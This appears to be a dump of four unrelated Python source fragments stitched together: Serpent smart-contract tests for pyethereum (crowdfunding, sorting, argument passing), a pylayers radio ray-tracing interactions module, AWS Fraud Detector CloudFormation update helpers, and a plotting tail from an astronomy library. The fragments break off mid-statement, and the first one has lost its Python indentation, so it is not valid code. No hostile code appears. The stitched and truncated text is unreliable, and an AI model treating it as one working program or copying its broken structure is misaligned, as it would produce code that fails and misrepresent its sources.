self.campaigns[id].goal = goal
self.campaigns[id].deadline = block.timestamp + timelimit
def contribute(id):
# Update contribution total
total_contributed = self.campaigns[id].contrib_total + msg.value
self.campaigns[id].contrib_total = total_contributed
# Record new contribution
sub_index = self.campaigns[id].contrib_count
self.campaigns[id].contribs[sub_index].sender = msg.sender
self.campaigns[id].contribs[sub_index].value = msg.value
self.campaigns[id].contrib_count = sub_index + 1
# Enough funding?
if total_contributed >= self.campaigns[id].goal:
send(self.campaigns[id].recipient, total_contributed)
self.clear(id)
return(1)
# Expired?
if block.timestamp > self.campaigns[id].deadline:
i = 0
c = self.campaigns[id].contrib_count
while i < c:
send(self.campaigns[id].contribs[i].sender, self.campaigns[id].contribs[i].value)
i += 1
self.clear(id)
return(2)
# Progress report [2, id]
def progress_report(id):
return(self.campaigns[id].contrib_total)
# Clearing function for internal use
def clear(self, id):
if self == msg.sender:
self.campaigns[id].recipient = 0
self.campaigns[id].goal = 0
self.campaigns[id].deadline = 0
c = self.campaigns[id].contrib_count
self.campaigns[id].contrib_count = 0
self.campaigns[id].contrib_total = 0
i = 0
while i < c:
self.campaigns[id].contribs[i].sender = 0
self.campaigns[id].contribs[i].value = 0
i += 1
"""
def test_crowdfund():
s = tester.state()
c = s.contract(crowdfund_code)
s.send(tester.k0, c, 0, funid=0, abi=[100, 45, 100000, 2])
s.send(tester.k0, c, 0, funid=0, abi=[200, 48, 100000, 2])
s.send(tester.k1, c, 1, funid=1, abi=[100])
assert [1] == s.send(tester.k1, c, 2, funid=2, abi=[100])
s.send(tester.k2, c, 30000, funid=1, abi=[200])
s.send(tester.k3, c, 59049, funid=1, abi=[100])
assert [59050] == s.send(tester.k1, c, 2, funid=2, abi=[100])
s.send(tester.k4, c, 70001, funid=1, abi=[200])
assert 100001 == s.block.get_balance(utils.int_to_addr(48))
mida1 = s.block.get_balance(tester.a1)
mida3 = s.block.get_balance(tester.a3)
s.mine(5)
s.send(tester.k5, c, 1, funid=1, abi=[100])
assert mida1 + 1 == s.block.get_balance(tester.a1)
assert mida3 + 59049 == s.block.get_balance(tester.a3)
saveload_code = """
data store[1000]
def kall():
a = text("sir bobalot to the rescue !!1!1!!1!1")
save(self.store[0], a, chars=60)
b = load(self.store[0], chars=60)
c = load(self.store[0], chars=33)
return([a[0], a[1], b[0], b[1], c[0], c[1]]:a)
"""
import bitcoin
def test_saveload():
s = tester.state()
c = s.contract(saveload_code)
o = s.send(tester.k0, c, 0, funid=0, abi=[])
assert o[0] == 0x73697220626f62616c6f7420746f207468652072657363756520212131213121, bitcoin.encode(o[0], 16)
assert o[1] == 0x2131213100000000000000000000000000000000000000000000000000000000, bitcoin.encode(o[1], 16)
assert o[2] == 0x73697220626f62616c6f7420746f207468652072657363756520212131213121, bitcoin.encode(o[2], 16)
assert o[3] == 0x2131213100000000000000000000000000000000000000000000000000000000, bitcoin.encode(o[3], 16)
assert o[4] == 0x73697220626f62616c6f7420746f207468652072657363756520212131213121, bitcoin.encode(o[4], 16)
assert o[5] == 0x2100000000000000000000000000000000000000000000000000000000000000, bitcoin.encode(o[5], 16)
sdiv_code = """
def kall():
return([2^255 / 2^253, 2^255 % 3]:a)
"""
def test_sdiv():
s = tester.state()
c = s.contract(sdiv_code)
assert [-4, -2] == s.send(tester.k0, c, 0, funid=0, abi=[])
basic_argcall_code = """
def argcall(args:a):
return(args[0] + args[1] * 10 + args[2] * 100)
def argkall(args:a):
return self.argcall(args)
"""
def test_argcall():
s = tester.state()
c = s.contract(basic_argcall_code)
assert [375] == s.send(tester.k0, c, 0, funid=0, abi=[[5, 7, 3]])
assert [376] == s.send(tester.k0, c, 0, funid=1, abi=[[6, 7, 3]])
more_complex_argcall_code = """
def argcall(args:a):
args[0] *= 2
args[1] *= 2
return(args:a)
def argkall(args:a):
return(self.argcall(args, outsz=2):a)
"""
def test_argcall2():
s = tester.state()
c = s.contract(more_complex_argcall_code)
assert [4, 8] == s.send(tester.k0, c, 0, funid=0, abi=[[2, 4]])
assert [6, 10] == s.send(tester.k0, c, 0, funid=1, abi=[[3, 5]])
sort_code = """
def sort(args:a):
if len(args) < 2:
return(args:a)
h = array(len(args))
hpos = 0
l = array(len(args))
lpos = 0
i = 1
while i < len(args):
if args[i] < args[0]:
l[lpos] = args[i]
lpos += 1
else:
h[hpos] = args[i]
hpos += 1
i += 1
shrink(h, hpos)
shrink(l, lpos)
h = self.sort(h, outsz=hpos)
l = self.sort(l, outsz=lpos)
o = array(len(args))
i = 0
while i < lpos:
o[i] = l[i]
i += 1
o[lpos] = args[0]
i = 0
while i < hpos:
o[lpos + 1 + i] = h[i]
i += 1
return(o:a)
"""
def test_sort():
s = tester.state()
c = s.contract(sort_code)
a1 = s.send(tester.k0, c, 0, funid=0, abi=[[9]])
assert a1 == [9]
a2 = s.send(tester.k0, c, 0, funid=0, abi=[[9, 5]])
assert a2 == [5, 9]
a3 = s.send(tester.k0, c, 0, funid=0, abi=[[9, 3, 5]])
assert a3 == [3, 5, 9]
a4 = s.send(tester.k0, c, 0, funid=0, abi=[[80, 24, 234, 112, 112, 29]])
assert a4 == [24, 29, 80, 112, 112, 234]
filename9 = "mul2_qwertyuioplkjhgfdsabarbar.se"
sort_tester_code = \
'''
extern sorter: [sort:a]
data sorter
def init():
self.sorter = create("%s")
def test(args:a):
return(self.sorter.sort(args, outsz=len(args)):a)
''' % filename9
def test_indirect_sort():
s = tester.state()
open(filename9, 'w').write(sort_code)
c = s.contract(sort_tester_code)
a1 = s.send(tester.k0, c, 0, funid=0, abi=[[80, 24, 234, 112, 112, 29]])
assert a1 == [24, 29, 80, 112, 112, 234]
multiarg_code = """
def kall(a:a, b, c:a, d:s, e):
x = a[0] + 10 * b + 100 * c[0] + 1000 * a[1] + 10000 * c[1] + 100000 * e
return([x, getch(d, 0) + getch(d, 1) + getch(d, 2), len(d)]:a)
"""
def test_multiarg_code():
s = tester.state()
c | |
#!/usr/bin/python
# -*- coding: utf8 -*-
from __future__ import print_function
"""
.. currentmodule:: pylayers.antprop.interactions
.. autosummary::
:members:
"""
import doctest
import os
import sys
import glob
import pdb
import doctest
if sys.version_info.major==2:
import ConfigParser
else:
import configparser
import networkx as nx
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import struct as stru
import pylayers.util.geomutil as geu
import pylayers.util.pyutil as pyu
from pylayers.util.project import *
from pylayers.antprop.slab import *
from pylayers.antprop.diffRT import *
class Inter(PyLayers):
""" Interactions
    Meta class of interactions (Interactions, IntB/IntL/IntT/IntR/IntD)
Attributes
----------
typ : int
type of interaction
1 : D
2 : R
3 : T
0 : Tx or Rx
-1 : B
data: np.array
data for the interaction
idx:
idx number of the interaction between 0 and (ray number * inter number)
fGHz : np.array
frequency range in GHz
nf : int
number of step into freq range
olf : np.array
np.ones((nf)) used for broadcasting
"""
def __init__(self,
typ=0,
data=np.array(()),
idx=[],
_filemat='matDB.ini',
_fileslab='slabDB.ini',
slab={}):
""" Inter object constructor
Parameters
----------
typ : int
data : ndarray
idx : list
_filemat : string
_fileslab : string
slab : SlabDB
"""
self.typ = typ
self.data = data
self.idx = idx
if slab=={}:
self.slab = SlabDB(filemat=_filemat, fileslab=_fileslab)
else:
self.slab = slab
self.idx = []
if idx != []:
self.idx.append(idx)
self.E = np.eye(2)
def __repr__(self):
if self.evaluated:
s = self.T.__repr__()
s = s + '\n' + self.R.__repr__()
s = s + '\n'+ self.D.__repr__()
return s
else:
return 'I not yet evaluated'
def create_dusl(self,a):
""" create dictionnary of used slab.
Parameters
----------
a : np.array of strings which contains ordered interactions
ordered as in self.idx/self.data
"""
for s in self.dusl:
self.dusl[s]=np.where(a==s)[0]
def sinsout(self):
""" calculate sin sout of the interaction
Notes
-----
typ
1 : Diffraction
2 : Reflection
3 : Transmission
si : self.data[:,1]
so : self.data[:,2]
typ = 0
LOS
typ = -1
Basis
"""
if self.typ in [2, 3]: #reflection & transmission
self.si0 = self.data[:, 1]
self.sout = self.data[:, 2]
elif self.typ == 1: # diffraction
self.si0 = self.data[:, 4]
self.sout = self.data[:, 5]
        elif self.typ == 0: # LOS
self.sout = self.data[0]
elif self.typ == -1: # B
self.sout = np.zeros((len(self.data[:, 0])))
def stack(self, data=np.array(()), idx=0, isdata=True):
""" stack data and the associated idx
Parameters
----------
data : np.array()
data to stack
idx :
index to stack
isdata: bool
False if you just want to stack idx (only used for intE class )
Examples
--------
>>> from pylayers.antprop.rays import *
>>> import numpy as np
>>> I=Inter()
>>> data = np.array(([3,4,5]))
>>> idx = 0
>>> I.stack(data,idx)
>>> I.data
array([3, 4, 5])
>>> I.idx
[0]
>>> data = np.array(([3,4,5],[7,8,9]))
>>> idx = [1,2]
>>> I.stack(data,idx)
>>> I.data
array([[3, 4, 5],
[3, 4, 5],
[7, 8, 9]])
>>> I.idx
[0, 1, 2]
"""
if isinstance(idx, int):
try:
if isdata:
self.data = np.vstack((self.data, data))
self.idx.append(idx)
except:
if self.idx == []:
if isdata:
self.data = data
self.idx = [idx]
else:
raise NameError('Issue in Inter.stack')
elif isinstance(idx, list) or isinstance(idx, np.ndarray):
try:
self.data = np.vstack((self.data,data))
except:
self.data=data
self.idx.extend(idx)
# for ii, idx in enumerate(idx):
# if isdata:
# try:
# self.data = np.vstack((self.data, data[ii]))
# except:
# self.data = data[ii]
# self.idx.append(idx)
class Interactions(Inter,dict):
""" Interaction parameters
    gathers all types of interactions (IntB/L/R/T/D)
Methods
-------
add(self,li): add a list of basis interactions
addi(self,i): add a single interaction
eval(self) : evaluate all the interactions added thanks to self.add or self.addi
    and create self.I, which gathers all those interactions
    The following 5 types of interactions are handled:
B : local basis transformation matrix (unitary)
L : LOS case
R : Reflection
T : Transmission
D : Diffraction
"""
def __init__(self,slab={}):
""" object constructor
"""
Inter.__init__(self,slab=slab)
self['B'] = []
self['L'] = []
        self['R'] = []
self['T'] = []
self['D'] = []
self.evaluated = False
self.nimax = 0
def add(self, li):
""" add a list of interactions
Parameters
----------
li : list
list of interactions
"""
# determine the total number of interactions
for i in li:
if i.idx != []:
self.nimax = max(self.nimax,max((i.idx)))+1
for i in li:
self.addi(i)
def addi(self, i):
""" add interactions into Interactions class
Parameters
----------
i : Inter object
"""
if not isinstance(self.typ, np.ndarray):
self.typ = np.zeros((self.nimax), dtype=str)
if i.typ == -1:
self.B = i
self['B'] = i.idx
self.typ[i.idx] = 'B'
if i.typ == 0:
self.L = i
self['L'] = i.idx
self.typ[i.idx] = 'L'
if i.typ == 1:
self.D = i
self['D'] = i.idx
self.typ[i.idx] = 'D'
if i.typ == 2:
self.R = i
self['R'] = i.idx
self.typ[i.idx] = 'R'
if i.typ == 3:
self.T = i
self['T'] = i.idx
self.typ[i.idx] = 'T'
def eval(self,fGHz=np.array([2.4])):
""" evaluate all the interactions
Parameters
----------
fGHz : np.array()
Notes
-----
self.I : np.shape(self.I) = (self.nf,self.nimax,2,2)
with self.nf : number of frequences
self.nimax : the total number of interactions ( of all rays)
self.sout :
distance from one interaction to the next one
self.si0 :
            distance from the previous interaction to the current one
self.alpha :
alpha as described in JFL Thesis
self.gamma :
            gamma squared (the square is already included), as described in JFL Thesis
"""
# Initialize the global I matrix which gathers all interactions
# into a single np.array
# f x i x 2 x 2
self.fGHz = fGHz
self.nf = len(fGHz)
self.I = np.zeros((self.nf, self.nimax, 3, 3), dtype=complex)
self.sout = np.zeros((self.nimax))
self.si0 = np.zeros((self.nimax))
self.alpha = np.ones((self.nimax), dtype=complex)
self.gamma = np.ones((self.nimax), dtype=complex)
# evaluate B and fill I
#OUT DATED , B MDA are stored outside of I
# try:
# self.I[:, self.B.idx, :, :] = self.B.eval(fGHz=fGHz)
# self.sout[self.B.idx] = self.B.sout
# self.si0[self.B.idx] = self.B.si0
# except:
# print 'Warning : No B interaction Evaluated'
# evaluate L and fill I
        # OUTDATED: the LOS interaction is managed outside of I
# try:
# self.I[:, self.L.idx, :, :] = self.L.eval(fGHz=fGHz)
# self.sout[self.L.idx] = self.L.sout
# self.si0[self.L.idx] = self.L.si0
# except:
# print 'Warning : No L interaction Evaluated'
# evaluate R and fill I
if len(self.R.data)!=0:
#try:
self.I[:, self.R.idx, :, :] = self.R.eval(fGHz=fGHz)
self.sout[self.R.idx] = self.R.sout
self.si0[self.R.idx] = self.R.si0
self.alpha[self.R.idx] = self.R.alpha
self.gamma[self.R.idx] = self.R.gamma
#except:
# print Warning('Warning Interaction.eval: No R interaction Evaluated,\ whereas Reflection rays found')
# pdb.set_trace()
# evaluate T and fill I
if len(self.T.data)!=0:
#try:
self.I[:, self.T.idx, :, :] = self.T.eval(fGHz=fGHz)
self.sout[self.T.idx] = self.T.sout
self.si0[self.T.idx] = self.T.si0
self.alpha[self.T.idx] = self.T.alpha
self.gamma[self.T.idx] = self.T.gamma
#except:
# print Warning('Warning Interaction.eval: No T interaction Evaluated,\ whereas Transmission rays found')
# pdb.set_trace()
# evaluate D and fill I
if len(self.D.data)!=0:
#try:
self.I[:, self.D.idx, :, :] = self.D.eval(fGHz=fGHz)
self.sout[self.D.idx] = self.D.sout
self.si0[self.D.idx] = self.D.si0
# self.alpha[self.D.idx] = self.D.alpha
# self.gamma[self.D.idx] = self.D.gamma
#except:
# print Warning('Warning Interaction.eval: No D interaction Evaluated,\ whereas Diffraction rays found')
# pdb.set_trace()
self.evaluated = True
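    # Minimal usage sketch (schematic, not from the library docs): the Inter
    # subclasses below are filled elsewhere via stack(), then gathered here.
    #
    #   I = Interactions(slab=SlabDB())
    #   I.add([B, L, R, T, D])               # previously stacked IntB/IntL/IntR/IntT/IntD objects
    #   I.eval(fGHz=np.arange(2, 11, 0.5))   # fills I.I with per-frequency interaction matrices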
class IntB(Inter):
""" Local Basis interaction class
Basis interactions
Attributes
----------
data : np.array:
WARNING np.shape(data) = (ninter x 4)
the input matrix 2x2 is reshaped as 1x 4
idx : list
index of the corresponding ray and interaction
Methods
-------
eval : evaluation of B interaction
Notes
-----
The interaction object is np.array with shape (nf,ninter 2, 2)
"""
def __init__(self, data=np.array(()), idx=[],slab={}):
Inter.__init__(self, data=data, idx=idx, typ=-1,slab=slab)
def __repr__(self):
s = 'number of B basis :' + str(np.shape(self.data)[0])
return s
def eval(self,fGHz=np.array([2.4])):
""" evaluation of B interactions
Parameters
----------
        fGHz : np.array()
frequency range
Returns
-------
self.data
Examples
--------
>>> from pylayers.antprop.rays import *
>>> M = np.eye(2).reshape(4)
>>> B = IntB(M,0)
>>> B.data
array([ 1., 0., 0., 1.])
>>> B.stack(M,1)
>>> B.data
array([[ 1., 0., 0., 1.],
[ 1., 0., 0., 1.]])
>>> eB=B.eval()
>>> nf = B.nf
>>> ninter = len(B.idx)
>>> np.shape(eB)
(1, 2, 2, 2)
"""
self.fGHz = fGHz
self.nf = len(fGHz)
self.sinsout()
if len(self.data) != 0:
lidx = len(self.idx)
data = self.data.reshape(lidx, 3, 3)
#return(self.olf[:, np.newaxis, np.newaxis, np.newaxis]*data[np.newaxis, :, :, :])
return(np.ones((len(fGHz),1,1,1))*data[None, :, :, :])
else:
print('no B interactions to evaluate')
return(self.data[:, None, None, None])
    ##### Interaction Loss is not used, for speed purposes
    # the loss interaction is computed and added after the global computation
# class | |
<filename>aws-frauddetector-detector/src/aws_frauddetector_detector/helpers/update_worker_helpers.py
import logging
from typing import Tuple, Set
from cloudformation_cli_python_lib import (
exceptions,
)
from . import validation_helpers, api_helpers, common_helpers, model_helpers, util
from .. import models
# Use this logger to forward log messages to CloudWatch Logs.
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.DEBUG)
DRAFT_STATUS = "DRAFT"
def validate_dependencies_for_detector_update(
afd_client, model: models.ResourceModel, previous_model: models.ResourceModel
):
# TODO: revisit this validation when/if we support in-place teardown
# For now, throw bad request for unsupported event type update, and validate external models + model versions
# (Other updates that would require teardown will throw exception and trigger rollback)
if model.EventType.Name != previous_model.EventType.Name:
raise exceptions.InvalidRequest(f"Error: EventType.Name update is not allowed")
if model.EventType.Inline != previous_model.EventType.Inline:
raise exceptions.InvalidRequest(f"Error: EventType.Inline update is not allowed")
if not model.EventType.Inline:
event_type_name = util.extract_name_from_arn(model.EventType.Arn)
(
get_event_types_succeeded,
_,
) = validation_helpers.check_if_get_event_types_succeeds(afd_client, event_type_name)
if not get_event_types_succeeded:
raise exceptions.NotFound("detector.EventType", event_type_name)
validation_helpers.validate_external_models_for_detector_model(afd_client, model)
validation_helpers.validate_model_versions_for_detector_model(afd_client, model)
def update_rules_and_inline_outcomes_for_detector_update(
afd_client, model: models.ResourceModel, previous_model: models.ResourceModel
) -> (Set[Tuple[str, str]], Set[str]):
# build list of kept rules, unused rules & new rules
previous_rules_by_rule_id = {r.RuleId: r for r in previous_model.Rules}
current_rules_by_rule_id = {r.RuleId: r for r in model.Rules}
# get list of outcomes and rule versions to delete
(unused_rule_versions, unused_inline_outcomes,) = _get_unused_rule_versions_and_inline_outcomes(
afd_client=afd_client,
detector_id=model.DetectorId,
previous_rules_by_rule_id=previous_rules_by_rule_id,
current_rules_by_rule_id=current_rules_by_rule_id,
)
# create new inline outcomes and rules
new_rule_versions_by_rule_id = _create_new_inline_outcomes_and_rules(
afd_client=afd_client,
detector_id=model.DetectorId,
previous_rules_by_rule_id=previous_rules_by_rule_id,
current_rules_by_rule_id=current_rules_by_rule_id,
)
# update persisting rules and rule artifacts (inline outcomes, rule versions)
(
rule_versions_to_delete,
inline_outcomes_to_delete,
persisting_rule_versions_by_rule_id,
) = _update_persisting_rules(
afd_client=afd_client,
detector_id=model.DetectorId,
previous_rules_by_rule_id=previous_rules_by_rule_id,
current_rules_by_rule_id=current_rules_by_rule_id,
)
# update model to include rule version for rules
LOG.debug(f"updating rule models: {model.Rules} with rule versions by rule id {new_rule_versions_by_rule_id}")
new_rule_versions_by_rule_id.update(persisting_rule_versions_by_rule_id)
for rule_model in model.Rules:
if rule_model.RuleId in new_rule_versions_by_rule_id:
rule_model.RuleVersion = new_rule_versions_by_rule_id.get(rule_model.RuleId)
LOG.debug(f"updated rule models: {model.Rules}")
# update unused rule versions and inline outcomes from persisting rules
unused_rule_versions.update(rule_versions_to_delete)
unused_inline_outcomes.update(inline_outcomes_to_delete)
# return rules and outcomes to delete (need to delete after updating detector version)
return unused_rule_versions, unused_inline_outcomes
def update_detector_version_for_detector_update(
afd_client, model: models.ResourceModel, previous_model: models.ResourceModel
) -> Set[Tuple[str, str]]:
# update detector version - create if previous is not draft
# update tags
# return set of unused detector versions (tuple: detector_id, detector_version_id)
desired_rules = []
for rule_model in model.Rules:
rule_dict = {
"detectorId": model.DetectorId,
"ruleId": rule_model.RuleId,
"ruleVersion": rule_model.RuleVersion, # rule version needs to be set before this
}
desired_rules.append(rule_dict)
external_models = model_helpers.get_external_model_endpoints_from_model(model)
model_versions = model_helpers.get_model_versions_from_model(model)
if previous_model.DetectorVersionStatus != DRAFT_STATUS:
LOG.info("previous detector version status was not DRAFT. creating a new detector version")
api_helpers.call_create_detector_version(
frauddetector_client=afd_client,
detector_id=model.DetectorId,
rules=desired_rules,
rule_execution_mode=model.RuleExecutionMode,
model_versions=model_versions,
external_model_endpoints=external_models,
detector_version_description=model.Description,
detector_version_tags=model_helpers.get_tags_from_tag_models(model.Tags),
)
else:
LOG.info("previous detector version status was DRAFT. updating detector version in place")
api_helpers.call_update_detector_version(
frauddetector_client=afd_client,
detector_id=model.DetectorId,
detector_version_id=model.DetectorVersionId,
rules=desired_rules,
rule_execution_mode=model.RuleExecutionMode,
model_versions=model_versions,
external_model_endpoints=external_models,
detector_version_description=model.Description,
)
# get arn of max version detector version in order to update tags and model
describe_detector_response = api_helpers.call_describe_detector(afd_client, model.DetectorId)
dv_summaries = describe_detector_response.get("detectorVersionSummaries", [])
dv_ids = [summary.get("detectorVersionId", "-1") for summary in dv_summaries]
max_dv_id = str(max([int(dv_id) for dv_id in dv_ids]))
model.DetectorVersionId = max_dv_id
if previous_model.DetectorVersionStatus == DRAFT_STATUS:
LOG.info("previous detector version status was DRAFT. updating tags separately")
# update dv does not update tags, so update tags in this case
get_dv_response = api_helpers.call_get_detector_version(
frauddetector_client=afd_client,
detector_id=model.DetectorId,
detector_version_id=max_dv_id,
)
latest_dv_arn = get_dv_response.get("arn", None)
common_helpers.update_tags(
frauddetector_client=afd_client,
afd_resource_arn=latest_dv_arn,
new_tags=model.Tags,
)
if model.DetectorVersionStatus != DRAFT_STATUS:
LOG.info(f"desired status is not DRAFT. updating detector version status: {model.DetectorVersionStatus}")
api_helpers.call_update_detector_version_status(
frauddetector_client=afd_client,
detector_id=model.DetectorId,
detector_version_id=max_dv_id,
status=model.DetectorVersionStatus,
)
dvs_to_delete = set()
new_describe_detector_response = api_helpers.call_describe_detector(afd_client, model.DetectorId)
updated_dv_summaries = new_describe_detector_response.get("detectorVersionSummaries", [])
LOG.info(f"updated detector version summaries: {updated_dv_summaries}")
for summary in updated_dv_summaries:
dv_id = summary.get("detectorVersionId", "-1")
dv_status = summary.get("status", "ACTIVE")
if dv_id == max_dv_id or dv_status == "ACTIVE":
continue
dvs_to_delete.add((model.DetectorId, dv_id))
LOG.info(f"detector versions to delete: {dvs_to_delete}")
return dvs_to_delete
def delete_unused_detector_versions_for_detector_update(afd_client, unused_detector_versions: Set[Tuple[str, str]]):
for detector_id, detector_version_id in unused_detector_versions:
api_helpers.call_delete_detector_version(
frauddetector_client=afd_client,
detector_id=detector_id,
detector_version_id=detector_version_id,
)
def delete_unused_rules_for_detector_update(afd_client, detector_id: str, unused_rule_versions: Set[Tuple[str, str]]):
# For now, just catch conditional check failed exception, which means the rule is still used.
# We will follow up with a more optimal approach (and avoid the try/catch)
for unused_rule_id, unused_rule_version in unused_rule_versions:
try:
api_helpers.call_delete_rule(
frauddetector_client=afd_client,
detector_id=detector_id,
rule_id=unused_rule_id,
rule_version=unused_rule_version,
)
except afd_client.exceptions.ConflictException as conflictException:
LOG.warning(
f"Conflict exception when deleting rule! Continuing without failure. "
f"This is likely from a rule being present in an active detector version. "
f"This can happen when transitioning from ACTIVE -> DRAFT, and keeping the ACTIVE version. "
f"Exception: {conflictException}"
)
def delete_unused_inline_outcomes_for_detector_update(afd_client, unused_inline_outcome_names: Set[str]):
for unused_outcome_name in unused_inline_outcome_names:
api_helpers.call_delete_outcome(frauddetector_client=afd_client, outcome_name=unused_outcome_name)
def validate_dependencies_for_inline_event_type_update(
afd_client,
event_type_model: models.EventType,
previous_event_type_model: models.EventType,
):
# TODO: revisit this validation when/if we support in-place teardown
# is_teardown_required = _determine_if_teardown_is_required(afd_client, model, previous_model)
# if is_teardown_required and not model.AllowTeardown:
# raise RuntimeError(TEARDOWN_CONFLICT_MESSAGE)
_validate_event_variables_for_event_type_update(afd_client, event_type_model, previous_event_type_model)
_validate_entity_types_for_event_type_update(afd_client, event_type_model, previous_event_type_model)
_validate_labels_for_event_type_update(afd_client, event_type_model, previous_event_type_model)
def update_inline_event_type(
afd_client,
event_type_model: models.EventType,
previous_event_type_model: models.EventType,
):
# NOTE: we've already done validation in `validate_dependencies_for_detector_update`
# In the future, we might want to move some event type specific validation here instead.
model_helpers.put_event_type_for_event_type_model(
frauddetector_client=afd_client, event_type_model=event_type_model
)
# if there is no difference in tags, we're done
if event_type_model.Tags == previous_event_type_model.Tags:
return
# update tags separately, for which we need Arn. get the eventtype we just updated to get arn
(get_event_types_worked, get_event_types_response,) = validation_helpers.check_if_get_event_types_succeeds(
frauddetector_client=afd_client, event_type_to_check=event_type_model.Name
)
# this should never happen, but throw internal failure if it does
if not get_event_types_worked:
error_message = f"Updating inline event type {event_type_model.Name}, but no event type exists!!!"
LOG.error(error_message)
raise exceptions.InternalFailure(error_message)
# get arn and update tags
event_type_arn = get_event_types_response.get("eventTypes")[0].get("arn", None)
common_helpers.update_tags(
frauddetector_client=afd_client,
afd_resource_arn=event_type_arn,
new_tags=event_type_model.Tags,
)
def _get_unused_rule_versions_and_inline_outcomes(
afd_client,
detector_id: str,
previous_rules_by_rule_id: dict,
current_rules_by_rule_id: dict,
) -> (Set[str], Set[str]):
unused_rule_versions = set()
unused_inline_outcomes = set()
unused_rule_ids = [
rule_id for rule_id in previous_rules_by_rule_id.keys() if rule_id not in current_rules_by_rule_id
]
# build list of outcomes and rule versions to delete
for unused_rule_id in unused_rule_ids:
unused_rule_model: models.Rule = previous_rules_by_rule_id[unused_rule_id]
# outcomes to delete
outcomes_to_delete = {outcome.Name for outcome in unused_rule_model.Outcomes if outcome.Inline}
unused_inline_outcomes.update(outcomes_to_delete)
# rule versions to delete
get_rules_response = api_helpers.call_get_rules(
frauddetector_client=afd_client,
detector_id=detector_id,
rule_id=unused_rule_id,
)
rule_details = get_rules_response.get("ruleDetails", [])
rule_versions_to_delete = {(rd.get("ruleId", None), rd.get("ruleVersion", None)) for rd in rule_details}
unused_rule_versions.update(rule_versions_to_delete)
return unused_rule_versions, unused_inline_outcomes
def _create_new_inline_outcomes_and_rules(
afd_client,
detector_id: str,
previous_rules_by_rule_id: dict,
current_rules_by_rule_id: dict,
):
# build list of new rules (and new inline outcomes) to create
outcomes_to_create = {}
rules_to_create = {}
new_rule_ids = [rule_id for rule_id in current_rules_by_rule_id.keys() if rule_id not in previous_rules_by_rule_id]
for new_rule_id in new_rule_ids:
new_rule_model: models.Rule = current_rules_by_rule_id[new_rule_id]
outcomes_to_create.update({outcome.Name: outcome for outcome in new_rule_model.Outcomes if outcome.Inline})
rules_to_create.update({new_rule_model.RuleId: new_rule_model})
# create new inline outcomes and new rules
_create_new_inline_outcomes(afd_client, outcomes_to_create)
return _create_new_rules(afd_client, detector_id, rules_to_create)
def _create_new_inline_outcomes(afd_client, outcomes_to_create: dict):
for outcome_name, outcome_model in outcomes_to_create.items():
tags = model_helpers.get_tags_from_tag_models(outcome_model.Tags)
api_helpers.call_put_outcome(
frauddetector_client=afd_client,
outcome_name=outcome_name,
outcome_tags=tags,
outcome_description=outcome_model.Description,
)
def _create_new_rules(afd_client, detector_id: str, rules_to_create: dict) -> dict:
new_rule_versions_by_rule_id = {}
for rule_id, rule_model in rules_to_create.items():
tags = model_helpers.get_tags_from_tag_models(rule_model.Tags)
rule_outcomes = [outcome.Name for outcome in rule_model.Outcomes]
create_rule_response = api_helpers.call_create_rule(
frauddetector_client=afd_client,
rule_id=rule_id,
detector_id=detector_id,
rule_expression=rule_model.Expression,
rule_language=rule_model.Language,
rule_outcomes=rule_outcomes,
rule_description=rule_model.Description,
rule_tags=tags,
)
new_rule_versions_by_rule_id[rule_id] = create_rule_response.get("rule", {}).get("ruleVersion", None)
return new_rule_versions_by_rule_id
def _update_persisting_rules(
afd_client,
detector_id: str,
previous_rules_by_rule_id: dict,
current_rules_by_rule_id: dict,
) -> (Set[Tuple[str, str]], Set[str], dict):
unused_rule_versions = set()
unused_inline_outcomes = set()
persisting_rule_versions_by_rule_id = dict()
persisting_rule_ids = previous_rules_by_rule_id.keys() & current_rules_by_rule_id.keys()
for persisting_rule_id in persisting_rule_ids:
current_rule_model: models.Rule = current_rules_by_rule_id[persisting_rule_id]
previous_rule_model: models.Rule = previous_rules_by_rule_id[persisting_rule_id]
(
rule_versions_to_delete,
inline_outcomes_to_delete,
persisting_rule_version_by_rule_id,
) = _update_persisting_rule(afd_client, detector_id, current_rule_model, previous_rule_model)
unused_rule_versions.update(rule_versions_to_delete)
unused_inline_outcomes.update(inline_outcomes_to_delete)
persisting_rule_versions_by_rule_id.update(persisting_rule_version_by_rule_id)
return (
unused_rule_versions,
unused_inline_outcomes,
persisting_rule_versions_by_rule_id,
)
def _update_persisting_rule(
afd_client,
detector_id: str,
current_rule_model: models.Rule,
previous_rule_model: models.Rule,
) -> (Set[Tuple[str, str]], Set[str], dict):
# check new outcomes vs old outcomes
previous_outcomes_by_name = {outcome.Name: outcome for outcome in previous_rule_model.Outcomes}
current_outcomes_by_name = {outcome.Name: outcome for outcome in current_rule_model.Outcomes}
unused_inline_outcome_names = {
outcome_name
for outcome_name, outcome in previous_outcomes_by_name.items()
if outcome_name not in current_outcomes_by_name and outcome.Inline
}
outcomes_to_update = {
outcome_name: outcome
for outcome_name, outcome in current_outcomes_by_name.items()
if outcome_name not in unused_inline_outcome_names and outcome.Inline
}
# new outcome model will not have Arn, as Arn is readonly for inline outcomes
existing_outcome_models = model_helpers.get_outcomes_model_for_given_outcome_names(
frauddetector_client=afd_client,
outcome_names=outcomes_to_update.keys(),
reference_outcome_names=set(),
)
for existing_outcome in existing_outcome_models:
desired_outcome_model = outcomes_to_update[existing_outcome.Name]
new_tags = model_helpers.get_tags_from_tag_models(desired_outcome_model.Tags)
api_helpers.call_put_outcome(
frauddetector_client=afd_client,
outcome_name=desired_outcome_model.Name,
outcome_description=desired_outcome_model.Description,
)
# use arn from existing outcome model to update tags
common_helpers.update_tags(
frauddetector_client=afd_client,
afd_resource_arn=existing_outcome.Arn,
new_tags=new_tags,
)
# rather than check all the differences, we can just update rule version and call it a day
# first, we need to get rules and grab latest version, since it's not anywhere
get_rules_response = api_helpers.call_get_rules(
frauddetector_client=afd_client,
detector_id=detector_id,
rule_id=current_rule_model.RuleId,
)
rule_details = get_rules_response.get("ruleDetails", [])
rule_versions = [int(rd.get("ruleVersion", "-1")) for rd | |
else:
if (file is not None) and (file != ""):
if (
not self.__props__["limbdarkened"]
and projection == STARRY_ORTHOGRAPHIC_PROJECTION
):
fig.subplots_adjust(
left=0.01, right=0.99, bottom=0.01, top=0.99
)
fig.savefig(file, bbox_inches="tight")
if not custom_ax:
plt.close()
elif not custom_ax:
plt.show()
# Check for invalid kwargs
kwargs.pop("point", None)
kwargs.pop("model", None)
if self.__props__["rv"]:
kwargs.pop("rv", None)
if not self.__props__["limbdarkened"]:
kwargs.pop("projection", None)
if self.__props__["reflected"]:
kwargs.pop("xs", None)
